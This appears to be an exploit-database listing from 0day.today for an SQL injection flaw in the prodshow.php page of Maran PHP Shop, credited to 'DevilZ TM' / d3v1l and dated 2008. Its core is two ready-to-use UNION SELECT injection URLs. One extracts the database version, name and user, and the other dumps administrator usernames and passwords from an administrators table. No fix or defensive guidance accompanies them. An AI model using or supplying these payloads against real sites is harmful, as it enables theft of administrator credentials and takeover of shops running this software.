[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Maran PHP Shop (prodshow.php) SQL Injection Vulnerability

Author
DevilZ TM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4038
Category
web applications
Date add
02-11-2008
Platform
unsorted
=========================================================
Maran PHP Shop (prodshow.php) SQL Injection Vulnerability
=========================================================


[~]-------------------------------------------------------------------------------------------------------------

[~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability
[~]
[~] http://www.maran.pamil-visions.com/maranshop.php
[~]  
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell 
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
[~] 
[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators
[~]----------------------------------------------------------------------------------------------------------------------




#  0day.today [2024-12-25]  #